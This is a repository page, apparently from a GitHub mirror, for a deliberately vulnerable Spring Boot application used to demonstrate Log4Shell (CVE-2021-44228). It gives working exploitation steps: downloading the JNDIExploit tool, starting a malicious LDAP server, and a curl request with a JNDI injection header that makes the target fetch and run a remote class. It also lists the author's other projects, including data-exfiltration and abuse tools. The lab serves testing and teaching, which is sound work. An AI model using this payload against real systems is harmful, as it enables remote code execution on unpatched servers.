• Stars
    star
    1,055
  • Rank 43,716 (Top 0.9 %)
  • Language
    Java
  • License
    Apache License 2.0
  • Created almost 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).

Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.

Running the application

Run it:

docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

Exploitation steps

Note: This is highly inspired from the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandbox environment.

Update (Dec 13th): The JNDIExploit repository has been removed from GitHub (presumably, not by GitHub)... Click Here to Download the version cached by the Wayback Machine.

wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • Then, trigger the exploit using:
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • To confirm that the code execution was successful, notice that the file /tmp/pwned.txt was created in the container running the vulnerable application:
$ docker exec vulnerable-app ls /tmp
...
pwned
...

Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contributors

@christophetd @rayhan0x01

More Repositories

1

CloudFlair

🔎 Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
Python
1,880
star
2

censys-subdomain-finder

⚡ Perform subdomain enumeration using the certificate transparency logs from Censys.
Python
579
star
3

Adaz

🔧 Deploy customizable Active Directory labs in Azure - automatically.
HCL
368
star
4

spoofing-office-macro

🐟 PoC of a VBA macro spawning a process with a spoofed parent and command line.
VBA
364
star
5

duplicacy-autobackup

💾 Painless automated backups to multiple storage providers with Docker and duplicacy.
Shell
246
star
6

mindmaps

🔍 Mindmaps for threat hunting - work in progress.
148
star
7

IPv6teal

👋 Stealthy data exfiltration via IPv6 covert channel
Python
91
star
8

firepwned

🙏 Checks Firefox saved passwords against known data leaks using the Have I Been Pwned API.
Python
81
star
9

nextcloud-docker-compose

☁️ Spin up a Nextcloud instance with automatied backups and SSL certificate issuance.
75
star
10

docker-python-sandbox

A Docker-powered NodeJS sandbox to execute untrusted python code.
JavaScript
62
star
11

nmap-nse-info

Browse and search through nmap's NSE scripts.
Lua
58
star
12

code-execution-api-demo

JavaScript
17
star
13

aws-sso-device-code-authentication

Python
16
star
14

fun-with-vpc-endpoints

HCL
14
star
15

geolocate-ips

Batch IP geolocation script.
Python
12
star
16

abusing-cloudflare-workers

Abusing Cloudflare Workers to establish persistence and exfiltrate sensitive data at the edge.
JavaScript
10
star
17

telegram-downbot

A Telegram bot to monitor websites
CoffeeScript
6
star
18

polybot

CoffeeScript
5
star
19

unix-commands

Some useful UNIX commands
4
star
20

falias

Shell
2
star
21

powercoders-docker

Repository for Powercoders Docker presentation and workshop
Python
2
star
22

filezilla-passwords-revealer

JavaScript
1
star
23

hackathon

JavaScript
1
star
24

flame-maker

Java
1
star
25

fos2015.github.io

Website for the Foundations of Software course at EPFL in the Fall 2015 semester
CSS
1
star
26

Rails-app

Ruby
1
star